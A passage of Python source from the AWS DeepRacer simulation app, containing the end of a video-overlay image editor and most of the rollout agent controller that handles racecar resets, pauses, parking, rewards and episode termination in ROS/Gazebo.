loc_x, loc_y = XYPixelLoc.RACE_TYPE_EVAL_LOC.value
if self.is_league_leaderboard:
loc_x, loc_y = XYPixelLoc.RACE_TYPE_RACE_LOC.value
race_text = "race" if self.is_racing else "evaluation"
evaluation_type_txt = "{} {}".format(RACE_TYPE_TO_VIDEO_TEXT_MAPPING[self.race_type], race_text)
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=evaluation_type_txt,
loc=(loc_x, loc_y), font=self.amazon_ember_light_italic_20px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# AWS Deepracer logo at the bottom for the community leaderboard
if self.is_league_leaderboard:
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=AWS_DEEPRACER_WATER_MARK,
loc=XYPixelLoc.AWS_DEEPRACER_WATER_MARK_LOC.value,
font=self.amazon_ember_regular_16px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Check if the done flag is set and set the banner appropriately
if mp4_video_metrics_info.done and (int(total_laps) == current_lap):
# When the cv2 text is written, it automatically drops the alpha value of the image
rel_y_offset = XYPixelLoc.TRACK_IMG_WITH_OFFSET_LOC.value[1] if self.is_league_leaderboard else 0
major_cv_image = cv2.cvtColor(major_cv_image, cv2.COLOR_RGB2RGBA)
racecomplete_image = utils.get_image(TrackAssetsIconographicPngs.RACE_COMPLETE_OVERLAY_PNG.value,
IconographicImageSize.RACE_COMPLETE_IMAGE_SIZE.value)
x_offset = major_cv_image.shape[1] - racecomplete_image.shape[1]//2
y_offset = major_cv_image.shape[0] - RACE_COMPLETE_Y_OFFSET - rel_y_offset - racecomplete_image.shape[0]//2
major_cv_image = utils.plot_rectangular_image_on_main_image(
major_cv_image, racecomplete_image, (x_offset, y_offset))
return major_cv_image
def _edit_minor_cv_image(self):
""" Apply all the editing for the iconographic of the top view camera image
Returns:
Image: Edited image of the iconographic view of the top camera
"""
return self.top_view_graphics.plot_agents_as_circles(self.track_icongraphy_img.copy())
def edit_image(self, major_cv_image):
major_cv_image = self._edit_major_cv_image(major_cv_image)
minor_cv_image = self._edit_minor_cv_image()
offset_loc = XYPixelLoc.TRACK_IMG_WITH_OFFSET_LOC.value if self.is_league_leaderboard \
else XYPixelLoc.TRACK_IMG_WITHOUT_OFFSET_LOC.value
return utils.overlay_track_images(major_cv_image, minor_cv_image, offset_loc)
```
#### File: markov/agent_ctrl/rollout_agent_ctrl.py
```python
import copy
import time
from collections import OrderedDict
import math
import numpy as np
import rospy
import logging
from gazebo_msgs.msg import ModelState
from std_msgs.msg import Float64
from shapely.geometry import Point
from markov.visualizations.reward_distributions import RewardDataPublisher
import markov.agent_ctrl.constants as const
from markov.agent_ctrl.agent_ctrl_interface import AgentCtrlInterface
from markov.agent_ctrl.utils import (set_reward_and_metrics,
send_action, load_action_space, get_speed_factor,
get_normalized_progress, Logger)
from markov.track_geom.constants import (AgentPos, TrackNearDist, ObstacleDimensions)
from markov.track_geom.track_data import FiniteDifference, TrackData
from markov.track_geom.utils import euler_to_quaternion, pose_distance, apply_orientation
from markov.metrics.constants import StepMetrics, EpisodeStatus
from markov.cameras.camera_manager import CameraManager
from markov.common import ObserverInterface
from markov.log_handler.deepracer_exceptions import RewardFunctionError, GenericRolloutException
from markov.reset.constants import AgentPhase, AgentCtrlStatus, AgentInfo
from markov.reset.utils import construct_reset_rules_manager
from markov.track_geom.utils import euler_to_quaternion
from markov.utils import get_racecar_idx
from markov.visual_effects.effects.blink_effect import BlinkEffect
from markov.constants import DEFAULT_PARK_POSITION
from markov.gazebo_tracker.trackers.get_link_state_tracker import GetLinkStateTracker
from markov.gazebo_tracker.trackers.get_model_state_tracker import GetModelStateTracker
from markov.gazebo_tracker.trackers.set_model_state_tracker import SetModelStateTracker
from markov.gazebo_tracker.abs_tracker import AbstractTracker
from markov.gazebo_tracker.constants import TrackerPriority
from rl_coach.core_types import RunPhase
logger = Logger(__name__, logging.INFO).get_logger()
class RolloutCtrl(AgentCtrlInterface, ObserverInterface, AbstractTracker):
'''Concrete class for an agent that drives forward'''
def __init__(self, config_dict, run_phase_sink, metrics):
'''config_dict (dict): containing all the keys in ConfigParams
run_phase_sink (RunPhaseSubject): Sink to receive notification of a change in run phase
metrics (EvalMetrics/TrainingMetrics): Training or evaluation metrics
'''
# reset rules manager
self._metrics = metrics
self._is_continuous = config_dict[const.ConfigParams.IS_CONTINUOUS.value]
self._reset_rules_manager = construct_reset_rules_manager(config_dict)
self._ctrl_status = dict()
self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] = AgentPhase.RUN.value
self._config_dict = config_dict
self._done_condition = config_dict.get(const.ConfigParams.DONE_CONDITION.value, any)
self._number_of_resets = config_dict[const.ConfigParams.NUMBER_OF_RESETS.value]
self._off_track_penalty = config_dict[const.ConfigParams.OFF_TRACK_PENALTY.value]
self._collision_penalty = config_dict[const.ConfigParams.COLLISION_PENALTY.value]
self._pause_duration = 0.0
self._reset_count = 0
self._curr_crashed_object_name = ''
# simapp_version speed scale
self._speed_scale_factor_ = get_speed_factor(config_dict[const.ConfigParams.VERSION.value])
# Store the name of the agent used to set agents position on the track
self._agent_name_ = config_dict[const.ConfigParams.AGENT_NAME.value]
        # Set start lane. This is only supported for two-agent head-to-head races
self._agent_idx_ = get_racecar_idx(self._agent_name_)
# Get track data
self._track_data_ = TrackData.get_instance()
if self._agent_idx_ is not None:
self._start_lane_ = self._track_data_.inner_lane \
if self._agent_idx_ % 2 else self._track_data_.outer_lane
else:
self._start_lane_ = self._track_data_.center_line
# Store the name of the links in the agent, this should be const
self._agent_link_name_list_ = config_dict[const.ConfigParams.LINK_NAME_LIST.value]
# Store the reward function
self._reward_ = config_dict[const.ConfigParams.REWARD.value]
# Create publishers for controlling the car
self._velocity_pub_dict_ = OrderedDict()
self._steering_pub_dict_ = OrderedDict()
for topic in config_dict[const.ConfigParams.VELOCITY_LIST.value]:
self._velocity_pub_dict_[topic] = rospy.Publisher(topic, Float64, queue_size=1)
for topic in config_dict[const.ConfigParams.STEERING_LIST.value]:
self._steering_pub_dict_[topic] = rospy.Publisher(topic, Float64, queue_size=1)
#Create default reward parameters
self._reward_params_ = const.RewardParam.make_default_param()
#Create the default metrics dictionary
self._step_metrics_ = StepMetrics.make_default_metric()
# Dictionary of bools indicating starting position behavior
self._start_pos_behavior_ = \
{'change_start' : config_dict[const.ConfigParams.CHANGE_START.value],
'round_robin_advance_dist' : config_dict[const.ConfigParams.ROUND_ROBIN_ADVANCE_DIST.value],
'alternate_dir' : config_dict[const.ConfigParams.ALT_DIR.value]}
# Dictionary to track the previous way points
self._prev_waypoints_ = {'prev_point' : Point(0, 0), 'prev_point_2' : Point(0, 0)}
# Normalized distance of new start line from the original start line of the track.
start_ndist = 0.0
# Normalized start position offset w.r.t to start_ndist, which is the start line of the track.
start_pos_offset = config_dict.get(const.ConfigParams.START_POSITION.value, 0.0)
self._start_line_ndist_offset = start_pos_offset / self._track_data_.get_track_length()
        # Dictionary containing some of the data for the agent
        # - During the reset call, every value except start_ndist will get wiped out by self._clear_data
        #   (reset happens before every episode begins).
        # - If self._start_line_ndist_offset is not 0 (usually a negative value),
        #   then the initial current_progress is expected to be non-zero (usually negative), because progress
        #   is measured relative to start_ndist.
        # - This is calculated correctly by the first call to utils.compute_current_prog:
        #   since prev_progress is initially 0.0 and the physical position is not at start_ndist,
        #   utils.compute_current_prog will return a negative progress if self._start_line_ndist_offset is negative
        #   (meaning behind the start line) and a positive progress if it is positive (meaning ahead of the start line).
self._data_dict_ = {'max_progress': 0.0,
'current_progress': 0.0,
'prev_progress': 0.0,
'steps': 0.0,
'start_ndist': start_ndist,
'prev_car_pose': 0.0}
#Load the action space
self._action_space_, self._json_actions_ = \
load_action_space(config_dict[const.ConfigParams.ACTION_SPACE_PATH.value])
#! TODO evaluate if this is the best way to reset the car
# Adding the reward data publisher
self.reward_data_pub = RewardDataPublisher(self._agent_name_, self._json_actions_)
# subscriber to time to update camera position
self.camera_manager = CameraManager.get_instance()
# True if the agent is in the training phase
self._is_training_ = False
# Register to the phase sink
run_phase_sink.register(self)
# Make sure velocity and angle are set to 0
send_action(self._velocity_pub_dict_, self._steering_pub_dict_, 0.0, 0.0)
# start_dist should be hypothetical start line (start_ndist) plus
# start position offset (start_line_ndist_offset).
start_pose = self._start_lane_.interpolate_pose(
(self._data_dict_['start_ndist'] + self._start_line_ndist_offset) * self._track_data_.get_track_length(),
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
self._track_data_.initialize_object(self._agent_name_, start_pose, \
ObstacleDimensions.BOT_CAR_DIMENSION)
self.make_link_points = lambda link_state: Point(link_state.pose.position.x,
link_state.pose.position.y)
self.reference_frames = ['' for _ in self._agent_link_name_list_]
self._pause_car_model_pose = None
self._park_position = DEFAULT_PARK_POSITION
AbstractTracker.__init__(self, TrackerPriority.HIGH)
def update_tracker(self, delta_time, sim_time):
"""
Callback when sim time is updated
Args:
delta_time (float): time diff from last call
sim_time (Clock): simulation time
"""
if self._pause_duration > 0.0:
self._pause_duration -= delta_time
@property
def action_space(self):
return self._action_space_
def reset_agent(self):
        '''Reset the agent by resetting member variables and S3 metrics, and move the agent to
        its starting position at the beginning of each episode
        '''
logger.info("Reset agent")
self._clear_data()
self._metrics.reset()
send_action(self._velocity_pub_dict_, self._steering_pub_dict_, 0.0, 0.0)
start_model_state = self._get_car_start_model_state()
        # set_model_state and get_model_state actually occur asynchronously
        # in the tracker with the simulation clock subscription. So, when the agent
        # enters the next step function call, either set_model_state
        # or get_model_state may not have actually happened yet and the agent position may be outdated.
        # To avoid such a case, use blocking calls to actually update the model position in gazebo
        # and GetModelStateTracker to reflect the latest agent position right away at start.
SetModelStateTracker.get_instance().set_model_state(start_model_state, blocking=True)
GetModelStateTracker.get_instance().get_model_state(self._agent_name_, '', blocking=True)
# reset view cameras
self.camera_manager.reset(car_pose=start_model_state.pose,
namespace=self._agent_name_)
self._track_data_.update_object_pose(self._agent_name_, start_model_state.pose)
def _pause_car_model(self, should_reset_camera=False):
'''Pause agent immediately at the current position
'''
car_model_state = ModelState()
car_model_state.model_name = self._agent_name_
car_model_state.pose = self._pause_car_model_pose
car_model_state.twist.linear.x = 0
car_model_state.twist.linear.y = 0
car_model_state.twist.linear.z = 0
car_model_state.twist.angular.x = 0
car_model_state.twist.angular.y = 0
car_model_state.twist.angular.z = 0
SetModelStateTracker.get_instance().set_model_state(car_model_state)
if should_reset_camera:
self.camera_manager.reset(car_pose=car_model_state.pose,
namespace=self._agent_name_)
def _park_car_model(self):
'''Park agent after racer complete F1 race
'''
car_model_state = ModelState()
car_model_state.model_name = self._agent_name_
yaw = 0.0 if self._track_data_.is_ccw else math.pi
orientation = euler_to_quaternion(yaw=yaw)
car_model_state.pose.position.x = self._park_position[0]
car_model_state.pose.position.y = self._park_position[1]
car_model_state.pose.position.z = 0.0
car_model_state.pose.orientation.x = orientation[0]
car_model_state.pose.orientation.y = orientation[1]
car_model_state.pose.orientation.z = orientation[2]
car_model_state.pose.orientation.w = orientation[3]
car_model_state.twist.linear.x = 0
car_model_state.twist.linear.y = 0
car_model_state.twist.linear.z = 0
car_model_state.twist.angular.x = 0
car_model_state.twist.angular.y = 0
car_model_state.twist.angular.z = 0
SetModelStateTracker.get_instance().set_model_state(car_model_state)
self.camera_manager.reset(car_pose=car_model_state.pose,
namespace=self._agent_name_)
def _get_closest_obj(self, start_dist, name_filter=None):
'''get the closest object dist and pose both ahead and behind
Args:
start_dist (float): start distance
name_filter (str): name to filter for the closest object check
Returns:
tuple (float, ModelStates.pose): tuple of closest object distance and closest
object pose
'''
closest_object_dist = None
closest_object_pose = None
closest_obj_gap = const.CLOSEST_OBJ_GAP
for object_name, object_pose in self._track_data_.object_poses.items():
if object_name != self._agent_name_:
if name_filter and name_filter not in object_name:
continue
object_point = Point([object_pose.position.x, object_pose.position.y])
object_dist = self._track_data_.center_line.project(object_point)
abs_object_gap = abs(object_dist - start_dist) % \
self._track_data_.get_track_length()
if abs_object_gap < closest_obj_gap:
closest_obj_gap = abs_object_gap
closest_object_dist = object_dist
closest_object_pose = object_pose
return closest_object_dist, closest_object_pose
def _get_reset_poses(self, dist):
"""
Return center, outer, inner reset position based on given dist
Args:
dist(float): interpolated track dist
Returns: tuple of center, outer, and inner rest positions
"""
# It is extremely important to get the interpolated pose of cur_dist
# using center line first. And then use the center line pose to
# interpolate the inner and outer reset pose.
# If cur_dist is directly used with inner lane and outer lane pose
# interpolation then the result's pose difference from actual reset pose (where it should be)
# is too large.
cur_center_pose = self._track_data_.center_line.interpolate_pose(
dist,
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
inner_reset_pose = self._track_data_.inner_lane.interpolate_pose(
self._track_data_.inner_lane.project(Point(cur_center_pose.position.x,
cur_center_pose.position.y)),
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
outer_reset_pose = self._track_data_.outer_lane.interpolate_pose(
self._track_data_.outer_lane.project(Point(cur_center_pose.position.x,
cur_center_pose.position.y)),
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
return cur_center_pose, inner_reset_pose, outer_reset_pose
def _is_obstacle_inner(self, obstacle_pose):
"""Return whether given object is in inner lane.
Args:
obstacle_pose (Pose): Obstacle pose object
Returns:
bool: True for inner. False otherwise
"""
obstacle_point = Point([obstacle_pose.position.x, obstacle_pose.position.y])
obstacle_nearest_pnts_dict = self._track_data_.get_nearest_points(obstacle_point)
obstacle_nearest_dist_dict = self._track_data_.get_nearest_dist(obstacle_nearest_pnts_dict,
obstacle_point)
return obstacle_nearest_dist_dict[TrackNearDist.NEAR_DIST_IN.value] < \
obstacle_nearest_dist_dict[TrackNearDist.NEAR_DIST_OUT.value]
def _get_car_reset_model_state(self, car_pose):
'''Get car reset model state when car goes offtrack or crash into a static obstacle
Args:
car_pose (Pose): current car pose
Returns:
ModelState: reset state
'''
cur_dist = self._data_dict_['current_progress'] * \
self._track_data_.get_track_length() / 100.0
closest_object_dist, closest_obstacle_pose = self._get_closest_obj(cur_dist, const.OBSTACLE_NAME_PREFIX)
if closest_obstacle_pose is not None:
            # If a static obstacle is in the vicinity of the reset position,
            # put the car in the opposite lane and 1 m further back.
cur_dist = closest_object_dist - const.RESET_BEHIND_DIST
cur_center_pose, inner_reset_pose, outer_reset_pose = self._get_reset_poses(dist=cur_dist)
is_object_inner = self._is_obstacle_inner(obstacle_pose=closest_obstacle_pose)
new_pose = outer_reset_pose if is_object_inner else inner_reset_pose
else:
cur_center_pose, inner_reset_pose, outer_reset_pose = self._get_reset_poses(dist=cur_dist)
# If there is no obstacle interfering reset position, then
# put the car back to closest lane from the off-track position.
inner_distance = pose_distance(inner_reset_pose, car_pose)
outer_distance = pose_distance(outer_reset_pose, car_pose)
new_pose = inner_reset_pose if inner_distance < outer_distance else outer_reset_pose
# check for whether reset pose is valid or not
new_pose = self._check_for_invalid_reset_pose(pose=new_pose, dist=cur_dist)
car_model_state = ModelState()
car_model_state.model_name = self._agent_name_
car_model_state.pose = new_pose
car_model_state.twist.linear.x = 0
car_model_state.twist.linear.y = 0
car_model_state.twist.linear.z = 0
car_model_state.twist.angular.x = 0
car_model_state.twist.angular.y = 0
car_model_state.twist.angular.z = 0
return car_model_state
def _get_car_start_model_state(self):
'''Get car start model state. For training, if start position has an object,
reset to the opposite lane. We assume that during training, there are no objects
        in both lanes at the same progress. For evaluation, always start at progress 0.
Returns:
ModelState: start state
'''
# start_dist should be hypothetical start line (start_ndist) plus
# start position offset (start_line_ndist_offset).
start_dist = (self._data_dict_['start_ndist'] + self._start_line_ndist_offset) * self._track_data_.get_track_length()
if self._is_training_:
_, closest_object_pose = self._get_closest_obj(start_dist)
# Compute the start pose based on start distance
start_pose = self._track_data_.center_line.interpolate_pose(
start_dist,
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
# If closest_object_pose is not None, for example bot car is around agent
# start position. The below logic checks for whether inner or outer lane
# is available for placement. Then, it updates start_pose accordingly.
if closest_object_pose is not None:
object_point = Point([closest_object_pose.position.x, closest_object_pose.position.y])
object_nearest_pnts_dict = self._track_data_.get_nearest_points(object_point)
object_nearest_dist_dict = self._track_data_.get_nearest_dist(object_nearest_pnts_dict,
object_point)
object_is_inner = object_nearest_dist_dict[TrackNearDist.NEAR_DIST_IN.value] < \
object_nearest_dist_dict[TrackNearDist.NEAR_DIST_OUT.value]
if object_is_inner:
start_pose = self._track_data_.outer_lane.interpolate_pose(
self._track_data_.outer_lane.project(Point(start_pose.position.x,
start_pose.position.y)),
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
else:
start_pose = self._track_data_.inner_lane.interpolate_pose(
self._track_data_.inner_lane.project(Point(start_pose.position.x,
start_pose.position.y)),
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
else:
start_pose = self._start_lane_.interpolate_pose(
start_dist,
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
# check for whether reset pose is valid or not
start_pose = self._check_for_invalid_reset_pose(pose=start_pose, dist=start_dist)
car_model_state = ModelState()
car_model_state.model_name = self._agent_name_
car_model_state.pose = start_pose
car_model_state.twist.linear.x = 0
car_model_state.twist.linear.y = 0
car_model_state.twist.linear.z = 0
car_model_state.twist.angular.x = 0
car_model_state.twist.angular.y = 0
car_model_state.twist.angular.z = 0
return car_model_state
def _check_for_invalid_reset_pose(self, pose, dist):
# if current reset position/orientation is inf/-inf or nan, reset to the starting position centerline
pose_list = [pose.position.x, pose.position.y, pose.position.z,
pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w]
        if any(math.isinf(val) or math.isnan(val) for val in pose_list):
logger.info("invalid reset pose {} for distance {}".format(pose_list, dist))
pose, _, _ = self._get_reset_poses(dist=0.0)
# if is training job, update to start_ndist to 0.0
if self._is_training_:
self._data_dict_['start_ndist'] = 0.0
return pose
def send_action(self, action):
'''Publish action topic to gazebo to render
Args:
action (int): model metadata action_space index
Raises:
GenericRolloutException: Agent phase is not defined
'''
if self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.RUN.value:
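            # Steering is converted from degrees to radians, and the action's linear speed
            # (m/s) is divided by the wheel radius to obtain the wheel angular velocity
            # published on the velocity topics, then scaled by the simapp-version speed factor.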
steering_angle = float(self._json_actions_[action]['steering_angle']) * math.pi / 180.0
speed = float(self._json_actions_[action]['speed'] / const.WHEEL_RADIUS) \
* self._speed_scale_factor_
send_action(self._velocity_pub_dict_, self._steering_pub_dict_, steering_angle, speed)
elif self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.PAUSE.value or \
self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.PARK.value:
send_action(self._velocity_pub_dict_, self._steering_pub_dict_, 0.0, 0.0)
else:
raise GenericRolloutException('Agent phase {} is not defined'.\
format(self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value]))
def _get_agent_pos(self, car_pose, car_link_points, relative_pos):
'''Returns a dictionary with the keys defined in AgentPos which contains
the position of the agent on the track, the location of the desired
links, and the orientation of the agent.
car_pose - Gazebo Pose of the agent
car_link_points (Point[]) - List of car's links' Points.
relative_pos - List containing the x-y relative position of the front of
the agent
'''
try:
# Compute the model's orientation
model_orientation = np.array([car_pose.orientation.x,
car_pose.orientation.y,
car_pose.orientation.z,
car_pose.orientation.w])
# Compute the model's location relative to the front of the agent
model_location = np.array([car_pose.position.x,
car_pose.position.y,
car_pose.position.z]) + \
apply_orientation(model_orientation, np.array(relative_pos))
model_point = Point(model_location[0], model_location[1])
return {AgentPos.ORIENTATION.value: model_orientation,
AgentPos.POINT.value: model_point,
AgentPos.LINK_POINTS.value: car_link_points}
except Exception as ex:
raise GenericRolloutException("Unable to get position: {}".format(ex))
def update_agent(self, action):
        '''Update agent reward and metrics after the action is taken
Args:
action (int): model metadata action_space index
Returns:
dict: dictionary of agent info with agent name as the key and info as the value
Raises:
GenericRolloutException: Cannot find position
'''
# get car state
car_model_state = GetModelStateTracker.get_instance().get_model_state(self._agent_name_, '')
self._track_data_.update_object_pose(self._agent_name_, car_model_state.pose)
link_states = [GetLinkStateTracker.get_instance().get_link_state(link_name, reference_frame).link_state
for link_name, reference_frame in zip(self._agent_link_name_list_, self.reference_frames)]
link_points = [self.make_link_points(link_state) for link_state in link_states]
current_car_pose = car_model_state.pose
try:
# Get the position of the agent
pos_dict = self._get_agent_pos(current_car_pose,
link_points,
const.RELATIVE_POSITION_OF_FRONT_OF_CAR)
model_point = pos_dict[AgentPos.POINT.value]
self._data_dict_['steps'] += 1
except Exception as ex:
raise GenericRolloutException('Cannot find position: {}'.format(ex))
# Set the reward and training metrics
set_reward_and_metrics(self._reward_params_, self._step_metrics_,
self._agent_name_, pos_dict, self._track_data_,
self._data_dict_, action, self._json_actions_,
current_car_pose)
prev_pnt_dist = min(model_point.distance(self._prev_waypoints_['prev_point']),
model_point.distance(self._prev_waypoints_['prev_point_2']))
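        # Distance moved since the closer of the two most recent positions; this presumably
        # feeds the reset rules (e.g. an immobilized/stuck check) via AgentCtrlStatus.PREV_PNT_DIST below.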
self._data_dict_['current_progress'] = self._reward_params_[const.RewardParam.PROG.value[0]]
self._data_dict_['max_progress'] = max(self._data_dict_['max_progress'],
self._data_dict_['current_progress'])
self._prev_waypoints_['prev_point_2'] = self._prev_waypoints_['prev_point']
self._prev_waypoints_['prev_point'] = model_point
self._ctrl_status[AgentCtrlStatus.POS_DICT.value] = pos_dict
self._ctrl_status[AgentCtrlStatus.STEPS.value] = self._data_dict_['steps']
self._ctrl_status[AgentCtrlStatus.CURRENT_PROGRESS.value] = self._data_dict_['current_progress']
self._ctrl_status[AgentCtrlStatus.PREV_PROGRESS.value] = self._data_dict_['prev_progress']
self._ctrl_status[AgentCtrlStatus.PREV_PNT_DIST.value] = prev_pnt_dist
self._ctrl_status[AgentCtrlStatus.START_NDIST.value] = self._data_dict_['start_ndist']
return {self._agent_name_: self._reset_rules_manager.update(self._ctrl_status)}
def judge_action(self, agents_info_map):
'''Judge the action that agent just take
Args:
agents_info_map: Dictionary contains all agents info with agent name as the key
and info as the value
Returns:
tuple (float, bool, dict): tuple of reward, done flag, and step metrics
Raises:
RewardFunctionError: Reward function exception
GenericRolloutException: reward is nan or inf
'''
# check agent status to update reward and done flag
reset_rules_status = self._reset_rules_manager.get_dones()
self._reward_params_[const.RewardParam.CRASHED.value[0]] = \
reset_rules_status[EpisodeStatus.CRASHED.value]
self._reward_params_[const.RewardParam.OFFTRACK.value[0]] = \
reset_rules_status[EpisodeStatus.OFF_TRACK.value]
episode_status, pause, done = self._check_for_episode_termination(reset_rules_status, agents_info_map)
if not pause and not done:
            # If the episode termination check returns not paused and not done, and
            # reset_rules_status's CRASHED is true, then the crashed object must have a smaller normalized
            # progress compared to the rollout agent.
            # - If reset_rules_status's CRASHED is false, then the reward params' CRASHED should already be false.
            #   In such a case, from the rollout agent's perspective, there is no crash.
            # Therefore, set the reward params' CRASHED to false if not paused and not done.
self._reward_params_[const.RewardParam.CRASHED.value[0]] = False
if self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.RUN.value:
reward = self._judge_action_at_run_phase(episode_status=episode_status, pause=pause)
elif self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.PAUSE.value:
reward, episode_status = self._judge_action_at_pause_phase(episode_status=episode_status, done=done)
elif self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.PARK.value:
self._park_car_model()
episode_status, pause, done = EpisodeStatus.PARK.value, False, True
reward = const.ZERO_REWARD
else:
raise GenericRolloutException('Agent phase {} is not defined'.\
format(self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value]))
# update and upload metrics
self._step_metrics_[StepMetrics.REWARD.value] = reward
self._step_metrics_[StepMetrics.DONE.value] = done
self._step_metrics_[StepMetrics.TIME.value] = time.time()
self._step_metrics_[StepMetrics.EPISODE_STATUS.value] = episode_status
self._data_dict_['prev_progress'] = 0.0 if self._step_metrics_[StepMetrics.PROG.value] == 100 \
else self._step_metrics_[StepMetrics.PROG.value]
if self._data_dict_['current_progress'] == 100:
self._data_dict_['max_progress'] = 0.0
self._data_dict_['current_progress'] = 0.0
self._metrics.upload_step_metrics(self._step_metrics_)
if self._is_continuous and self._reward_params_[const.RewardParam.PROG.value[0]] == 100:
self._metrics.append_episode_metrics()
self._metrics.reset()
self._reset_rules_manager.reset()
return reward, done, self._step_metrics_
def _judge_action_at_run_phase(self, episode_status, pause):
self._pause_duration = 0.0
current_car_pose = self._track_data_.get_object_pose(self._agent_name_)
try:
reward = float(self._reward_(copy.deepcopy(self._reward_params_)))
except Exception as ex:
raise RewardFunctionError('Reward function exception {}'.format(ex))
if math.isnan(reward) or math.isinf(reward):
raise RewardFunctionError('{} returned as reward'.format(reward))
# transition to AgentPhase.PARK.value when episode complete and done condition is all
if episode_status == EpisodeStatus.EPISODE_COMPLETE.value and \
self._done_condition == all:
self._park_position = self._track_data_.pop_park_position()
self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] = AgentPhase.PARK.value
self._park_car_model()
# transition to AgentPhase.PAUSE.value
if pause:
should_reset_camera = False
pause_car_model_pose = current_car_pose
# add pause time based on different paused status
if episode_status == EpisodeStatus.CRASHED.value:
self._pause_duration += self._collision_penalty
# add blink effect and remove current agent from collision list
if self._collision_penalty > 0.0:
effect = BlinkEffect(model_name=self._agent_name_,
min_alpha=const.BLINK_MIN_ALPHA,
interval=const.BLINK_INTERVAL,
duration=self._collision_penalty)
effect.attach()
                # If the agent crashed into a static obstacle, reset first and then pause. This prevents
                # the agent and the obstacle from wiggling around, because no collision bit mask is used
                # between the agent and static obstacles
if 'obstacle' in self._curr_crashed_object_name:
pause_car_model_pose = self._get_car_reset_model_state(
car_pose=current_car_pose).pose
should_reset_camera = True
elif episode_status == EpisodeStatus.OFF_TRACK.value:
self._pause_duration += self._off_track_penalty
# add blink effect and remove current agent from collision list
if self._off_track_penalty > 0.0:
effect = BlinkEffect(model_name=self._agent_name_,
min_alpha=const.BLINK_MIN_ALPHA,
interval=const.BLINK_INTERVAL,
duration=self._off_track_penalty)
effect.attach()
                # When the agent goes off track, the current car pose might be closer
                # to another part of the track. Therefore, instead of using the
                # current car pose to calculate the reset position, the previous
                # car pose is used.
pause_car_model_pose = self._get_car_reset_model_state(
car_pose=self._data_dict_['prev_car_pose']).pose
should_reset_camera = True
self._pause_car_model_pose = pause_car_model_pose
self._pause_car_model(should_reset_camera=should_reset_camera)
self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] = AgentPhase.PAUSE.value
self._data_dict_['prev_car_pose'] = current_car_pose
return reward
def _judge_action_at_pause_phase(self, episode_status, done):
reward = const.ZERO_REWARD
self._pause_car_model()
# transition to AgentPhase.RUN.value
if self._pause_duration <= 0.0:
# if reset during pause, do not reset again after penalty seconds is over
self._reset_rules_manager.reset()
self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] = AgentPhase.RUN.value
if not done:
episode_status = EpisodeStatus.PAUSE.value
return reward, episode_status
def _check_for_episode_termination(self, reset_rules_status, agents_info_map):
        '''Check whether an episode should be terminated
Args:
reset_rules_status: dictionary of reset rules status with key as reset rule names and value as
reset rule bool status
agents_info_map: dictionary of agents info map with key as agent name and value as agent info
Returns:
tuple (string, bool, bool): episode status, pause flag, and done flag
'''
episode_status = EpisodeStatus.get_episode_status(reset_rules_status)
pause = False
done = False
# Note: check EPISODE_COMPLETE as the first item because agent might crash
# at the finish line.
if EpisodeStatus.EPISODE_COMPLETE.value in reset_rules_status and \
reset_rules_status[EpisodeStatus.EPISODE_COMPLETE.value]:
done = True
episode_status = EpisodeStatus.EPISODE_COMPLETE.value
elif EpisodeStatus.CRASHED.value in reset_rules_status and \
reset_rules_status[EpisodeStatus.CRASHED.value]:
# only check for crash when at RUN phase
if self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] == AgentPhase.RUN.value:
self._curr_crashed_object_name = agents_info_map[self._agent_name_][AgentInfo.CRASHED_OBJECT_NAME.value]
# check crash with all other objects besides static obstacle
if 'obstacle' not in self._curr_crashed_object_name:
current_progress = agents_info_map[self._agent_name_][AgentInfo.CURRENT_PROGRESS.value]
crashed_obj_info = agents_info_map[self._curr_crashed_object_name]
crashed_obj_progress = crashed_obj_info[AgentInfo.CURRENT_PROGRESS.value]
crashed_obj_start_ndist = crashed_obj_info[AgentInfo.START_NDIST.value]
crashed_object_progress = get_normalized_progress(crashed_obj_progress,
start_ndist=crashed_obj_start_ndist)
current_progress = get_normalized_progress(current_progress,
start_ndist=self._data_dict_['start_ndist'])
if current_progress < crashed_object_progress:
done, pause = self._check_for_phase_change()
else:
episode_status = EpisodeStatus.IN_PROGRESS.value
else:
done, pause = self._check_for_phase_change()
else:
pause = True
elif any(reset_rules_status.values()):
done, pause = self._check_for_phase_change()
return episode_status, pause, done
def _check_for_phase_change(self):
        '''check whether to pause an agent
Returns:
tuple(bool, bool): done flag and pause flag
'''
done, pause = True, False
if self._reset_count < self._number_of_resets:
self._reset_count += 1
self._reset_rules_manager.reset()
done, pause = False, True
return done, pause
def finish_episode(self):
        '''finish the episode by appending episode metrics, uploading metrics, and
        alternating direction if needed
'''
if not self._is_continuous:
self._metrics.append_episode_metrics()
self._metrics.upload_episode_metrics()
if self._start_pos_behavior_['change_start'] and self._is_training_:
self._data_dict_['start_ndist'] = (self._data_dict_['start_ndist']
+ self._start_pos_behavior_['round_robin_advance_dist']) % 1.0
# For multi-agent case, alternating direction will NOT work!
# Reverse direction will be set multiple times
# However, we are not supporting multi-agent training for now
if self._start_pos_behavior_['alternate_dir'] and self._is_training_:
